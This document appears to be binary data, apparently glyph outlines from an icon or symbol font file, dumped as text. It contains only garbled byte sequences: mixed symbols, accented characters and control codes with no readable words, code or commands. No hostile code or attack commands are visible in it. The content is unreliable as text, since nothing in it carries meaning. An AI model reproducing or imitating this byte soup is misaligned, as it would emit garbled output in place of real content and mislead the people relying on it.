h$IS)E6@F%…á1o1tFePAsJ-YP(ÿjèSD" 7676'&'&54&+".'326=4&+>7;26=#";ôˆtqCDDCqttqCDDCqt9Xd“ŸŸ“eXe“  ”RDCqtþðtqCDDCqttqCDü¯ŸŸ“dXd”  “eXe“ÿj£R'7"'.5476752767654'.32654&+"­/LABœB@L/Io;9adêea9; oþù
"//"
!//ž­(79@Mƒ&''&ƒM@97(­#uKMUuea9;;9aeuTNKuþí0!H"//"þ¸!0ÿjèR&14'./#&#1"13127676765è«{TWi_\Œ#!#\>MOXsgdF6^-.ƒÊ-*(’^XZJHw\<$%20VBOSXÿÿÿñéÌ*#47654.6'.2676'267654'&æ(="u¶(=!‡é0/ϗ'C)¨w'B)W9A!7U/Pˆ[8*/\¯$Q# f3/DDP3/(3=4ÿýÿ¦è*N%#"&=#"&=46;'&"?626'#54&+"#";;26=326=4&Ì)v))?imþñÌ
;
ë
"
ë
܅A‚‚A…B)€)„(ñ

ú
	µ	!þõ
ŠŠ

‚‚A„„Aÿüÿ|ì=.G"/#&'&?4/.>?26?>23762'&6?'./ÿÜ	Û6	7¾#ýf
#,$
eý#¿7	ýŽy#‹FŒ#y¡9AA9
%ù¨*)èé)*©ø%lCŸSSŸCl)••)ÿþÿ¬è+;%&6?#"&=46;&5'&"?626'!"3!26=4&¥

»&&5mmþñ

Ì

;
ë ìèþU

«
Ì
	&y%úú
	µ	
þö
	ŠŠ	

N

Nÿýÿ~ë;'62'%&"&76&/&67%>7åw'Þ@
ÿ
&
ÿ@ß',þðÄ
%þÞ
——"%
ÄÿižU)?H'&'&'.'&7676'&'.'&>76&/&'.7676'&'–I^0#&_FKª@

V:	

P!	+<A"i2W"þ|Ttå8A!,A


AEe2O9@
þ÷:,1#
-1l'
†\@wì(èï463!2#!"&5üpÃÉÿõÿXâ^(%'.'&767676.76767'ä?WTSW~?6IF•?l¤ZdaìqvW`"!!"Àƒ‚`G'¨t?~WTSW?6(mZ¤cH'#%W`‚ƒÀ"!!"`G^)2ÿ]ä_147367676/.#&'7%77676767¬!%6HE”?k -*caìpuW@%$9 &6HE”?iþa;caìpuW@%#dHE1#6'kWÞÂcH'#$WAROW0KA.&6'jXþðcH'#$W@ROWÿjèR 0@!"3!2>54.".4>234'&'&+5323&'&'&'532{üò2222ýE00:1>Þ31TVd€ok?A¦ZW‹Ž§šˆÑ:<R2üò222ü1:00,>dVS12h@?kn€§‹VYw;:шŒšÿiéR)%'654'&'&"327?6&%".4>2Öë+64Z\Ö\Z4664Z\k\V×.uý¤AoAAo‚oAAo=ØV\k\Z4664Z\Ö\Z46+ëu.©Ao‚oAAo‚oAÿhëWu‚‹”ÿw€‰’%&'&'.7676'&'&'.?6'&'&'"'&/./&'&76767>767>'&'&67656".4>2&>&"&462&5&>7676&/&6763276'&#"&7676'&'&'.'54'&'&'&#"73267676'&>&7>..>&'.?6'&'&&?6'&#"/&#/&7632?6367676'4'&676'4.>'">..>
)(", 	'1*,:'	8,"	')
+#
,0	%*$/!
B,%,þt1Q02RaQ/0R/#42G43$ ¥




	
(		
	
	
	

ƒDH"DH.
#"#
	¿
	

			
	S 

žX5&
 +#

()
$(?(/W,&4%
	

-@
.:^1SaQ/0RbQ0	2G33F4~"!	
,	 	(	


	+
)	


œ"H"DH!s#!
$ Bö
				




  7

ÿõÿ[îMFSo‡&'.7>72>&'.'&'&67>676?>'&76'&'"2>4.>76&'.'&/&&7>'#"&'&?6›#0=‹25$rGJ<9ŒF-ys>
*#Z](
5G
6)PJ!
IO!

7#þ*H*)HUI+*I«#?3+80'/
)þØ>,A !ã.,0‰@CQ)(ADIH%41l~,$'2+O=?)&N(	6:‹*GUI+*HUI*þH4,

#,Z		è	B2	""	ÿúÿièX 0	./&2764&462""'&4?62ÎþQV"ƒ"VP/6«Iü½6M87M†º
$
þë

¹$

¯5-QU"‡#VþUJ,M76N6þ¸º


$
º

þë
$ÿè;&6F!";!2>54.#!"&=463!25#!"&=463!25#!"&=463!2|üð22ß"22B	ýT	

	¬		ýT	

	¬		ýT	

	¬	;2þ-2þñ2Ó2þ	

		

						

		

	ÿè;(1!";!2>54."&4623"&4623"&462|üñ33Þ"22ýO&66L77æ&66L77æ&77L66;2þ-2þñ2Ó2þH6L77L66L77L66L77L6ÿÿÿè-&BKcŠž«5676?67>'&>76'&&&'&/&'&767>&&'&/&'&67676276?6764'&/&.76?>'7>&'g%&		
F
™h
**3@$.S**49\
™'K9	
þe-W
C…C

TQ$rv'M.p($-
/(M<gK$K;2	
"
‚
 +)
WN
3(-@8#œe6&g1;=
	˜%M9
ë-0"C…B

QTvr$%N.ª,		-&#	1&O<
ýŠV";H&,U# 5.)‚54.!,11è• -E%#3%#3."276764'&'&".4>2'54&+"2?64'¯Q<(ÿü£R9ÿ(<YTHF)**)FH¨HF)**)FHV7^77^o^77^	
\
ß2X!««!Xç*)GH¨HF)**)FH¨HG)*ýþ7]p^77^p]7èmƒ
\


ÿj#R$4!"3!2654&32+"&46"&4627#!"&5463!2ÌþQ$33$¯$33þ½ŽŽL''8((áþ]£R3$üÆ$33$:$3$üh'8((8'ÎlÿùèÃ$-6?HQZ%!2654&+54&+"#"546;2#"264&3"264&3"264&3"264&3"264&3"264&¾$$($ò%(%%~
¶
ôþ¾!!.  š !-!!›!!.!!›!!.!!›!!.  š !-!!¬%
$S$$S$þö%¥

;þ6!.  .!!-!!-!!.  .!!.  .!!. !-!!-! .!ÿjŽR(<654'&'&#"3>32!"3!2>=4&"&=.54>2ù$"<=H:hJqL.)F)þš6[55[6¦6[6Tþê($4>4$Î^PM./?qG8F8a95[6Þ6[55[6ÞDjþ½@):;(@7!44!7è\+8D%.!.2".4>&'&34&%&'&'&36%4632"..672´^À^A 	'à,I+*JWI+*Iÿ3LF0:ÏýC{eÐõ:(.-5/ý×*:;).:¹96%:.´*IWJ,*KXI*þN,-1'#4E,3Å):-5..G9R;-*:ÿŠè2
%&$!.2'.4676[­þž­<)'èGþdPEB')(&CD¡DCPNCD/hd".,41T#(&BD EB()('ˆ¡‡&(ÿìèÑ#/;G!"3!2>54.46;2+"&5!"&463!2'!"&463!2'!"&463!2|üñ2222üØ µ  µ àý>
Â

þÀ@

þÀ
@
Ñ2ýõ233«  Ñ  Ù¨‚ÿè;"!";!2>54.&546|üñ33Þ"22ýýý;2þ-2þñ2Ó2þއ‡
ÿè;"!";!2>54./&4?6|üñ33Þ"22þðýý;2þ-2þñ2Ó2þ$‡
‡ÿ¿èþ !67&355#35#%#335#35#èýŒ¬jjþYÇ1ÇýÎÈÈúÇÇþÅÅÆÆA?üÁ7þÖ[::!NNPOOý•NOkOýFO
ÿÐèì/?O_oŸ¨%"#'?&+'#54&#!"3!26=!27+"&=46;2+"&=46;2+"&=46;2+"&=46;2346;2+"&5+"&=46;2546;2+"&+"&=46;23##»hm%2ð
ýŽ

r
$
ü·

”



6c

5g



?ÃdhǦ°¹=~

ý%
g;

,#ý’

,##ýµ

,##ýÃ

À«±ÿÿÿÅè÷.H]{“&&'&'.7>76'&7>76;'"'&7676'&'&7>'&'&7676'&7>&'&'&'47>767>#%'.=6'46;6à@	gt		(<_
„""
0	
I 2
#=$I$-6&þú}I
gW
	þ¿	


ƒþC
*	!ŠP	
/)dv+:
 Žq
p(PbgM
,IYh`P?#`E
$/@-4,59q9
Z<,SiP@
6k`? 3E"
ÿ¬í)LR[bgmrw|‚†Œ%&'.'..'&>763>67664767676'&&'&'&%&'7&/7%'7&/7&'&'7'7'6?5'5?3&'56 E1X%
gJ
 ?-6"=0-g();
 bý+/-4:jI:p
	
‰Eþy-(	ßUþO

KÞ
2þÜ7;j	5¹
…	J:éþí0&%A&!N4!#@)E,$7 !5i)g&)ªB62+V8
	)6
# ã76S5 )!%%@OþF 0U]Ú3VVÛ2
ÿÞèß4Ohq%7'.'&'.'4/567676767>73/&'&'.6767676'&'&'&'&676762"&46Æ 
3
)¦ÑΘ;0‹	$	F0¯ˆ	‰# $0bx~]!&4^h~wbLþ9g*+:M8#"@6?,+=,,d‡#}Œ


2K#s
¢((;
Y!&#?-$J-.,$+6  
-Ó,<,+=,ÿiéR)M%'654'&'&"327?6&%".4>2#54&+"#";;26=326=4&Öë+64Z\Ö\Z4664Z\k\VØ.uý¤AoAAo‚oAAo<Y


Y


Y


Y


=ØV\k\Z4664Z\Ö\Z46+ëu.©Ao‚oAAo‚oAY		Y	

Y


Y
	ÿiéR)9%'654'&'&"327?6&%".4>2#";26=4&Öë+64Z\Ö\Z4664Z\k\VØ.uý¤AoAAo‚oAAo<ý


ý


=ØV\k\Z4664Z\Ö\Z46+ëu.©Ao‚oAAo‚oA



	ÿÎèî#5>a#54#!"#"3!2654&"&746#&"&=46372"&462463!2#54&"#4'4.#54&"#Â^$ýj^œl.@-/?-þÑ:;;:þç.?..@.[Mw[\w3˜#
™ýèþ£ -/!--€Ž -.@-.¯q

	è­&7DQ_vˆ#!./47>;63!2?>3731#";26=4#2>4."676.#!"&'&'4'"#&"&56'546;2#%462"&%"&462è:'üò'93 G	lnp$;	þf
Íþ<,0080­+=/80/
;þ±+4 ˜þS$4%$4%Ä$4%%4$Tþ"%.%ê!1¶º+"Ô
{

xR+=0800…=,0/80Þ)bIUþ_!#*%%3%$%$4%%ÿièS5767676'&'&&'5&'547>47>ò‡tpBD('‹Z]e‡tpBCEBquUX\-*,*/OiRECqu†f]Y‹&'ECqttrADýê42dF#
+@
$ÿ_ÈS9£'&'&'&>7637676?>">'&67>67676?>'&76&746767676#&5676676#&54>76&/.3'&3'.'&&^*&&R9BA?*+1a?1>)†B
"1@+œ(
iÔP'
!


#"
	

þåš&9*+I /*
:jL36D?nG	4
 ”K

&"+0

 &vìX,	

	
!		
	þĪ
,(ÿÿÿiéS+8ER_lu&7676'&'&"'&'.767622>4."2>4.""2>4."2>4.'4."2>7>."õe]Y‹'(CBqtuqCDDArtŠxfc:<;;cgðfd:<;;cgò$?&%?H?&%?O$?&%>H?&$?H$?%%?H?%%?þ×%>#%>J>$%?n%?H>$%?H>$VR'&‹Z]f‡tqCDCAqtuqCEüU<9cfðgd:<;:cfðgd:<%>H?%$?H?%$%?G?'%?H?&%?H?$%>H?%ˆ%>I>$&>J=#L$>%&>I?$%?RÿðéÌ0:HTgz†²ÀÈÙ!.<M®½154&+"#+"&=4632764'&+"'"7!26'56''"6;2%632+'&4"#"5&32'&#5#'.743632'+'.7676;2'*"6;2'#47*"5&632&#&"&7546;23"+"&54;2'#"4;2'+"'&546767+&"&56'463725763535&74&#!"36376'6.67'./&3%"2>4.567>#&#&76?6&'&67623?656565654##""#"'&'4'525167632254?474743636;6363727301"#&676743ÍDø	Z
y<	¨


þt		-


	

	




	7Q5
	öB
		

	
		XLf3
	
ÈÈ
þ:ss		'Ï K:5UžDsDCr„sCBpâ		
¿	
O

				_	š
	ÕÓ
Mk3 ¹þo<?	

:![#	þÊ
š		NN
= =
›{{

?eYWþÒ
ª%&vrRZ'Ar†rECr…rDþë
	
"	



3


S :
	ÿ§x)&/&&#&3>723267676Y=É.K(*%F6)H-	/R6J?j'	Z1þ.=")J2'H-ï
D9$,98OÿŸê'=KV…264&>6'=6'5&'&#"&76&5&76737636&5476762.54>&'&'&'&76'#'&'&>76'<'466'&ƒ
'f46,6HKRiZX35OZº	.[T'
5

	‘.?@\>3x$0$.,96j&-06-jd"1
Y7*ƒ
º!!
Š·\:!"53XZi^¢k'/,s
	W1+q
4@\??/2`)!
 þ_
! &_T'"1B;ê:1%3"#ÿÿÿÅêõj|Œ%65?6?5&754##"'&3632767676567567476?2"'&'"7676%>'&676&?676&%&32767676	H%k>;!˜!&M,	 $-	8#r4‘T""= (P/6'üé	)Ÿ	*6
ýg
		'AhYr^)KF]
	°#HWE#:.) 2C!	&D,D:
+37&!Ç
		"

3Í)	8¶g/ÿ¦5Ed‚%.676.'&676''&'&'&'&'&'&/&7>>=3'&'&'&'&/&7>='&'&'&'&/&êG& #;)# ð'-(#{

-
"&-!1!+î		§			

´5þD*	62	
,þ´)	2	
æ›& 
þO		8	-$		
	
—c
iÿ¤‚3'&'&>5476?%76'&'&>54&/þ…#0	
,K,,KXG(

N

,J,,JXK,0t
>"þp-CF4,A$U	iþî-BF5
-A#."#ÿ¤]H`n#";26=4&"2>4."/&"/&?64/&4?62?62'54&6=2>4.1".4>2ÑÂ!9!!9B8!!8		>þê2S11S2,K,,KYL,,Lûû:!9B9!!9B9!«ßã
ß/ö0Þ
ã1TbT1þ¦,LYK,,KZK,ÿjèS ," 7676'&'&"&5462"&5462ôˆtqCDDCqttqCDDCqtÖ!.!!.!!.!!.!RDCqtþðtqCDDCqttqCDýr!!6!!þÊ!!6!!ÿÿÿnèM(76767654'.'&%.54>)(HFµ`_µFH(*GBâ€c·(+—`¾6þ¬
^j^YDCGFBDY^kŒtl€G†Y_z:u!	#	Ð¡ÿjéS(4"3254'&'&"'&'&476762&/&7%7õ‰trBDEBqtˆÎ%DBquƒqa_7997^aä`_6897^`I1J:&RDCruþïtpAD%χuqBEüh97^`ãa_7897_aã`^69,
þx	¥ÿýÿZS ?^qw7&7>765&54.767>&'&'&/&676&'&.'.7676?6&76764'.'&7~,`S
²yT 
.Q$W#3SZ$r]?G (D„.JqO§”3<
m¯xx05V?ý1-+’RQ‘+.-*PS”,.ã—MþñËntRŠZ
.‚Yy0<bX
.wW# 4''O7˜¨N¨þõ]&OC"	* 
-D%YJEQOFJ±JDPOFJI	].§ÿièS)5A767676'&'&&'&75&7>"&=462"&=462ò‡tpBD('‹Z]e‡tpBCEBqu°x<|<t&&°&&RECqu†f]Y‹&'ECqttrADýåF! ,D/
F%#jùùùÿ¨c&54>
767%“

Œäþ8
kÕ@ý€X

(
U©Ÿ	‰þì4A€Á‚ÿjVY0Š“œ¥45&7>76.'&=02326'56.3"#".>;26=6'.'&74'&=4627676'4'&=462;2#"&4624>&7.46'462"&/R3:nQ4Z7<mJãMM;^18Fš001	GwN'DUQGJ&$(*Q¢0&&Ø%%Ø%%Ø&&ÄZ,4[>
#S:þ¦8`@,Z<¤ENigP$
Z;%—&ýë

LuF$	
A-
 ]0))KDR@A
^KŽ
&¡%%|&ÿjèS	/IVq„27.#" 7676'&'&676'.4''.5&7674676322".4>6767676?6761".6767>#"&ô
ˆtqCDDCqttqCDDCqtþ!E
X>um'@%&ANA$&A¡





f:	:kB
DCqtþðtqCDDCqttqCDþ™C 	
r=;{&AN@%&AN@%þ–	%
		t
9e
j<ÿièS66767654'.'&6767676'&/'&'&6ö‡tpBD('ŒZ\e‡tqADEBquUY[-* >?z–ECqu†f]Y‹&'ECqtþðtrAD51‡/
%

"H$ÿÿÿ”ê("3E‰²Æâÿ'"7676'&456'&"7676>'&276767>76'.&/&76'.'&/&63676'&>'&67676'..05&63&&72."'&/&47567672&/&67676&'&'&4676&'&7767676?6&.676'&à
	
þ§
#ýÃ
	 t-	:!N*!'(;Z
C7538\B
F
05T"!"B.¥,B"!@
	
#þ~<; 
u>6*K	
 

	þ	!
e
		!þ¯-
			Ã8
	H^+8]q
+&./6,/$5!
8E/4]U#f($
8«;L;þ§j\'H=	
7		>.)&##=3q)§*	%!$$	&K#)
¼]
$ÿÿèj
1CVhx‹ °ÁÐâô%&54632%"#=46;456'46732+&&56'7'&"74632'#=46;'#=46;64546;6+&5%&#"=4;2#&"&75&36&#"=4;24546;2+&"5%#&"=4;2#&"=46;2+"&=46;6·
ÿ
ý…			Æ

þÛ
	m
¨
ý£



“
	
k

	!
¨

ý

	!
‘
ý&R
÷þò#E#	þÅ
#F4NN	;
‰56Ù	X8­8))®W

{
 
‚	?
i
2
Q
'
O
èk¶"'&/&'&"'5&/&'&'&'&11"'5&'&'&'&'&'&"/&'&'&+"3272>76?6?636767676?6767675>7676?>76;5&|
	.	
	

 	

	


*	
		-e	>

!!
 
	

	
			26H;
."H(.&!
#-k>'*:
	.
$0
"!
$!,
&*K$
)		$
8]. 	5	'M&'!%	&-2ÿÿÿhèT)&7>7654'&'&!"&5463!2þi_\&'BApt‡g^[Œ&(CAorþÒ--. ,,R'&Œ[]e†sqCF'&Š[]f†tpCEý+-. ,, þÒ-
ÿjèR/?O_oŸ¯¿Ì3%2654&#!"32+"&=46#32+"&=46#32+"&=46#32+"&=46!2#!"&546#"&=46;23#"&=46;23#"&=46;23#"&=46;2#"&=46;2#"&=46;2&'&?64
·

üI
¡4
4
½6

6
»66
ÇA
A
	a

üŸ
LA

A»6

6º6

6
»4

4Ä=

=

=

=þäK		Û
:üH

·
Z

Z
\

\
Z

Z
Z

Z
·
þ

ó
ý%
Z
Z

ZZ

[

[

Z
Z

[
[

[
[
þÇ(L

ê

uÿþÿpèF%5>Tet2326'.#!"3!26=&74&#!"&=6'&62.'&>"&4627654&%>'.#"%>'.#"ÐÏ
$ý×%	"1$þ^Þ!9" 9 #:# :þ$%2%%ã N'06JE		 þ2)F),G),J(,$%þ³!8!#9 $: #;	þ*$z¤Q	!6 #;$!8 "<$Ù$4$%4$Ð:&>·B*92N,J,(E)-K+(G#;#7!$<B8 ÿ©p 1CUl•ž!#7%>'&'.#3!265'54&32+"&767>632+&?6+"&?6763632%&'&/&6?62&/&6?&/5&?6762.46bþ
ç	þìpâ\ÞŽRm	
Ä	AeRR
=f	
	j	Ú."!'€'+
/À „
F#K=	ýmÖ
_7.08'ý5	3
1	
''
A
^!!ÿÀªü?"#"54'.+>54."#>4."#"3!27676=;2654&“z	y+6,JXK,6,Ê1:1@h
z 	nH	Q1,J,,J,2P1:11:1þC
~I
*

ÿæèØ8Sd454&6=4764'&%&'&6767674&'&"27674%"#";2654&%"&"2767&é( )Fu<Ù,[Œv!p `"xK	týK67nÄ" 
G¨a`
Yþç%@
¼
?|lM
’Ç‘bˆ±c&{Q"c™Y:huÇ
FE
;^^ÿ§²!>56'.+";2676'67676'&'&D	S¦‹

Œ°i

›
4".D])(_^Ÿ	H’þá
›\è!50;>2;;pwqmkZÿf·V,FV%4=6=4764'&4=4&#&"3.767&'&676&;Ÿ“zþÈhk6	þQ/@ uu!-+.	^é
$	þ	
$	ï
%,Q	zB~ý·8:ø
 T Æ98±þû † /-\0N|}§	üy$
	‡$ÿ§ô!56'.+";2676'ó	S¦‹

Œ°i

^Ÿ	H’þá
›\ÿÖÃå=[x5.+";27&'.?67676'&%27>&'&"67676&'&—¼
]	_	~?
­
1H"(

B,	H(J%þð1)
9
O1=T|	#>7@_¥
Án8	T&%(	XXibi^$)RUœ¦f`
7;YXOP
	

]ÏÏ\V	#!(V)#'
LPL‘=ÿÿè½RU#54'54/&'&'&'&'&/&#&+&"33?273676767676?è
!7#7221C!2dT,-17.
 J½—>+Eý¥¥	"')'&% Z- !4>*0!GRè¸2Xdp™¥±ÁÉÕ1!"3!2>54.#576725164'#'6?63213"##"&514632&'#3267#5##53353#3#3#53#"&514632&'#'#"1"#12?'#53737"&51462"&=3326=3##5#531"&51462OýJ)G))G)¶)G))Gýo<	
	
9
\G($$(==8	=K""M GB©
¸)G*þ€*G))G*€*G)þ€	
		LLKL!+&+*+99&	è/DQh€ˆ”¢®ÅÒÞê14632.#"3267#"&#57>4&"'>32;27"&51462&"7"26514&>=4&#"63235#"&5146327&#"327'%3353535#535#35#%#"&=#2=+5#3573'"&514627&#"327'7"26514&"&51462%#5#35335##^<1R11R1<_#uU(	
	
:G2$#5 }$	
1A			


›þ˜$66$;pF


tþû^#8G1RbR1H8	$#"
		


$#T2	
	


	311(
	C%%%C&


	3"


CC
è¸E}³	9e~§¶ÆÛÞ!"3!2>54.676?54'.#'"767676"'&/#"'.'32367267>+"=4&"+"='&"#"=&&'5#"'&/57>36?254'4&#'"&7>##'#"/"/"/&/&/&/46333337362672?2?63727#5"6?67567645'."#'43736&3?6367&'&/"'5476?305#"=4;237#"'&'&56767672#"=4&'&+"=4;23476?636%"676=4676=4&+"7.36?6=413OýJ)G))G)¶)G))Gþ@

‘			$

	

C

	,




	
	!?

g	
Z	
ýµ	û
Ô
		o¸)G*þ€*G))G*€*G)þ¼



&
	V	IF:D:dl			
	

#		
	
(
		
	4>
Ad	

A5	
	!		>	

Nèø9J…¹Èô"Ë
&'&75<'&'.26567672767?6'&'&7676;62326=47>;2=7676;2=4'5.&#54+"%32767?6&/&=4'.'&676"7>;2.%4'&'&"#54+";2=7676;25'&'&37>76'&&'&'.5#7676&##""#/&/	"/&/&/&3223;76232?6?676?6?6?>7&'#5?65&754+";76762656'4&'&""&37631#2?6?6?674?6'&'13“	
'!			$:
V		!	:	
$%
	¤


+µ



"		
	



A6c4&a 		




1	
PZ

UZ		lqœ

;		):			1
	œSa„


&#
1


	˜	_
M! 			7			è¸*Wy…žª®Òó-1@JSXai!"3!2>54.2;2#'4.+#6'23253273#5#+"&/4'#"/4#&"####/+"=36676;273#3#3##5&5&+#532"7#3#3#5373##+532>'4'".76;01#"3##532726&'"&54>3#"37+/&'#"&'4#'#'#"'&63#"325?6532536533'"+3#32?'&5#"#32654'3"#3256&74&+32OýJ)G))G)¶)G))Gþ/ì
"Ä
AA
>;(&&(;I1G)(();;>

)">
"W
"!
	
€þ
(((,/
ˆÁ
C¸)G*þ€*G))G*€*G)÷

0
C0H21,3WH
›

f
I

H}Hs
	
	
	m
3"A
0)o
<cuëEIk{†ÂÆÛäý!Osw5#'&'.'#'&'4#&#+"'&'.76;5#'";756732;57'67"#"&'&+;2?6773537676'.##535#532&/&'&4?"#53%6?672135#'&/.+&/&'#3676;2;5;72'67.+353235'&'7>"#53'4&'7>.'#"35335&'"#53272#535#535#335#535#535#&'&"+.6;541#&32+327676'&./"/&6;5#&#3676#3›
	


7	6.³ð23
jk2È,AA@
c	$G,þó
0#	
%5!28
¹@P%
,)[		
L%)	\A??A```C@@CaÀ70-
q
7	
7
þhˆwOk=)

TK5+‰!
v!*\	),
Œ	"SwN

nAwR03+Ÿx*
	©v)	
*)vË(



%vè¸8Hn‘¥´!"3!2>54.'&6#'&&'&76762?67'#5437632&'.7676326'4'."'.76367##'67676'&'5327257673%&+#"3767676&>76'5OýJ)G))G)¶)G))GýÑ
3
	%
	
³+_$‚	!%		þÑ

q

¸)G*þ€*G))G*€*G)Ì#È

*6 
8jSÄ
¬			

	
Ir >&M8Zp0M	g
ÿýèD4Cix¦&7'&'&&/&7676?67&%&#"35767676'&=43724'&'&#>32#"6?3'&5'".6767637&'&'.+6367676?67%>ú,
)//'!<%$	.%-! $#!#)5)Þ %-	,.
$9!&!
$
	í#	,!
&
;üö$|1	"2VEËþʆ%82}$q*

%	#*4	
!“Qe$T>/p8	)	
'˜"t
&)è¸!5Qjrvz~†ŠŽ•ªÖðSjœ¨·Ã"32?676=/654&+3264&+32!"3!2>54.36762#54/&##5'32#+%676##535#53'53753#"&5533537#'&6;##5#53"#53>;"+"&='#"&/4?4?6?54&"'623#54&+"#53>32'""/.4>?63254#"'>323"&5''"&#'7326'54/"&#&5'76?62'&"3327&#'"3##5#53547632+267#"'&/&'&47>27"#53>;7'#5373"32?6='70#"34&q
	[0ýJ)G))G)¶)G))GË	Í@

8þ»%Lxûýûûûûê""?ýõz
,
	)	+

	
			
	(
	


*	
	?	!þؘT!+t)G*þ€*G))G*€*G)þÊ60	1U

w(?Å}}a|||||‘,,	'(	'8	
M%#
''"	vD#$1<ÿÿè$(,@HQ{ˆ¦²ºÎü"ReŽ˜§!?6!5!573#"#"&=37!4'&63#53#53+532'3264&#4&+326".54>354#"'676323"&/527>=/"#54&#"#53>32'#5373##5#53"#53676;2"'.'&4676?6;254&"'62;3#"&'5'2?5'"#54&##53>32"#/73264&/.4?>?2'&"75#535462'"3#"'&/&'5&4?6767632#326574&"7"#53>;0^þ£	ž7nþ¤\þ¤//„.Áþ¡å++S++
NY_$		*)	Z

			
		

	
Ò$$ g
$$('+.þ"='


	^!	
	





/	*	
S
¹S:Õ Ò­¤Ȭ¬¬T 		
	G!		P		#	*




	B
Dv
	
L0
#¤_13C0==!6+
	
	
	 6
#	%	


% !6è¸Vt‹§Ò÷½.5;EKR1!"3!2>54.3#101+01#"1###535#5321"1#01#01#####97&"3#535#536;3333#5#81###01#0101#01#015+'#01#01#01#'#81#015#01#4#'#81#501'01#5'1815'&=035750153015013015017350135373501353015301350;01309021013813015#50901501#9841#8901#5#01'01#81#'01#01##01#01#0109"#"01#"#'3'373431013737320131013339013#535#533#5354#"3#535#536323"####"&=#53533#;53530130537377.#"3#535#53>;0130321303#;01353013730251343735375+0&+"5#'01#'#841#0981#81'01#501#5#015#5#015#5#5#01501#5'015"415&35'501547017471673057582513?21301301330130130130181338153010101301301#;6;01370137357+"5#&#/"401#0150"1#41#141'5#5/5#535476?263736;0133090138130181381301333%4+32#324326=&#"%"3.3"3.OýJ)G))G)¶)G))Gþ/

¶,		$A,	E
	G9T			
;D-
E1	I1		ý¨
l	#
C	#
¸)G*þ€*G))G*€*G)þÒ17

#
,#.	#	
$
#
	

è¡3Q]gk‡œ±ÄÊÜâ535#532#'324#324+7&"3#535#5363254&#"'6323#5#"&547632&"326=#535#535#5335#536323#5354#"3#7#53533#27#"&57&"3#535#53632#"&462#3267'3."#"&462#327'3."7

©D!
L	



	X%.7
	
-.…++®D!
h
)L
=6·)K
=6T	
e  T#
5
		
'	
5FXr5)$F  %
	
5
6	(
1	(	è¸1>^„‘ÃÐý3Xtƒ›Ÿ£¼Ãèø1BMYbŠ!"3!2>54.>"'&'7>&'&/&4767#"&5'4;6&5436?63+"&/&"#&"/.76;24+&546;2"'&+"=437274676?632&/#"37273>5#".+5325"+'"5'5+"'&5'&4?6354'&"'6237&'"/"'54?6732&#""33#'"/73264#267#"'.5476767627#54'&""#536?62"#"&=33267'&'&'&4?67>2"#535#53736?62#54&"##'373#267#"&'&/&47>327"#536?6;#"'532?657'373%"32?>="'475/."32?&'&'&+32>4'&"34&3"3.%264&"'6?6"&"&?6&#"'46'76OýJ)G))G)¶)G))GýŽ&a 
	'	
		 
	~		
(
	:@@Q
	!!

04		#0J4
	3*þK”œ@"	Ó#	þ	¸)G*þ€*G))G*€*G)Ï u$S>72

z
	

	¸vZW
i			W6’NGxyC	CyC55%		(CQ	C44J@<	>*è'Os€‘¸ë!Uo‹¡½Ïáÿ#*O[k€'&'6?>'&'&"7.46?'&'&'&#"32+"'&'&3632'6'&'&6;76?'&#&"76766";26'4%"&3&75&74&32?617664&474&&?6&"&2?67>7'"'&'.54?67>3227."754&">32'&#"267;5#'"&4?632"'3726764&/4"#'"46327."37.#"5#3576?>2354'6?6'54/&'&"3276'".4&474>276576?>2354/.#"5#3.+32767>54'&'+5327.#"3267'".5354&4747>7632"#"=#3?'73#53#'#37#.#"32767'"'.5354&4?676327"5#35676354#'#'#"'326?|	&{0
9DJG
%2'Z		"	¶6Gþ½	š	Û	
[	


(		
?


K
'
	
Ô))


n	

A<F
Lf	

	A<Q
F!#!’(
C)ë
	
	!	>šþ4	2
						$C

07r
		4K
	
			Zb
?TuNBTT		
		%	T3AAT	

dè¸-:LX!"3!2>54.+&'&767676;6"2>4."'&'&'&676736=46OýJ)G))G)¶)G))Gá(6	Y_8(">"?
<.)þì.N-.M\N..NT



…$#¸)G*þ€*G))G*€*G)þ!	K4G0#6
",()O.N[N..N\M.ª`&=”Á2=$è¸3c|¦Ëä#>YsŒ»é%U‰µâ	&3kœ¾ÇÕÞìõþ
!"3!2>54.276?7676"'&&756=4'"47276754/"514372361#""=".75&'"4126=4"5767230+"4'.'&6762"'5.'"5'427>2374=6'#"514?27676&2+"4'62+"?32'&;>=4'#476727>3232+"4;6=4&"32+"43'2#"&4626=4/"437>;6+"4'2;2+"570726=&+"&+'"'&767676;&"42=4#"4;0#"327"1/2+&"4325754#"514;654#"5774+"72#'"4326=4+"0"516=0;;253+"4;6=4#"4;2"1'4+";262"51.+"26742&"5'4+2+&"427=4&#"5143#"27"/32#&"472=4#1"4;354&#"514;01#"'"1"4265'41#";02#&"46?4376217"15&+"2#&"5726=4+"'#73;27321'45'4676#'.6754#'&01#&"5736=4"4;21#"0'"&'&63271"'&/4#721#&"514726=4&"4;2254#"4;2#"&'4;2/.+";2#&1"432576?2632171#"432=4#"4;2"36?4121%"64&'&'&'&676?=73276&'&#"6&'&326&";7676&67474&3'3'OýJ)G))G)¶)G))G.2
l
	
	

=
#	.
J;
3 5"	).
)
"(),	"	



	/


+
"ýo%54K55:	
G		¬


þã«	
Y
½	¸)G*þ€*G))G*€*G)þÛ'
	1!&	
+;F

	&			
G
G&F5)&
*& "	!

& !
7	

	

G
 &			”5J55K5[3
!	Qi
0
	
8	

	9
	

#ÿüêá(FWu­ä3=qz™Ï:FU‰²ðEK~µÐó*3=L&'&#"3732767676'&".4>2723";27>&'&"'"232#&=6&%67>'.54&6'.=472?4#'&'&'&7>7673251&54#'&324+"=43>+";5#"&=&#"5431+"3%27673672514+"&=4"#.=4&#"6?4&&'&54;254&'>+""/&/43?6'&'&+"32;6324"&=463624'#5432%2;54+.=4&31#&4+"32#/&'&+"32"31626#"5&7532'5632'"#"32"5/&#"32"3624+"=36'543244&#"32/&/&#"32#734#=307325<&7432'"37>'&#'&547>'37>76/.>;5'4#&&/4#"2324#&=46>&'&54";#"1&'"=4;22=6"+"=4;62&54#'"3#";2574"/4"362=4#&?6;2#"3624'67"'&'&'&#";24+"?4;2";24'6770&+"&2=>;2#"3624'"&=32;654750!0&+"&#";2=>;2#"36224"=4;2212&752'232'4#.=4&"3#"0"##.=4624+&32#";2574"=4624+"32"736#%24+'#"2#"3624+&=4%>&"&7676&'4=4!*	,,'D

%/
¯ 6  7@7  7Ä&
	%	

¶


	þ
u
	þï
	#
		
¯

		Ù		
	Ì
\


	¦



	1	
H%›



#Þ
$D'
þü'
	'

&ý“
	þÐþÌ[

	Å' 1&6&7 É 7@8  7A7 Í?)&


G@&1.
 ,


'"(9
